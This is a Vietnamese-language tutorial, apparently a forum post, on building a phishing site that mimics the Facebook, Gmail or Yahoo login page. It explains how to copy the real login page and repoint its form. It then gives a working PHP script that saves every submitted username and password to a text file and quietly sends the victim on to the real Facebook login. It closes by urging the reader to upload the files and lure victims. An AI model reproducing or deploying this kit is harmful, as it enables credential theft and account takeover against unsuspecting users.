Phishing có nghĩa là làm một website giả mạo để người dùng lầm tưởng là trang chính và cung cấp các thông tin quan trọng cho attacker như user và password.

Chúng ta cần phải có những thứ cần thiết sau:

1. Hosting
2. Domain
3. Source

Vấn đề 1 và 2 thì các bạn có thể mua hoặc kiếm ở đâu đó, ở đây mình chỉ cung cấp source gồm 3 file chính.

File index.html của trang web giả mạo

- Có thể bạn muốn làm 1 trang facebook, gmail hay yahoo giả mạo. Chỉ cần xem source code của trang đăng nhập, copy và lưu lại thành "index.html".

- Chú ý phần code của nó, tìm "action=".  Sau đoạn này là một URL, khi ta đăng nhập nó sẽ chuyển ta đến URL này. Vì vậy chúng ta phải chuyển hướng đến 1 nơi khác, đó là chuyển đến file "login.php" sau đây.

File Login (login.php)

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

File lưu ID và Password của victim (pswrds.txt)

Bước cuối cùng là upload 3 file này lên host của bạn, dụ victim đến và ...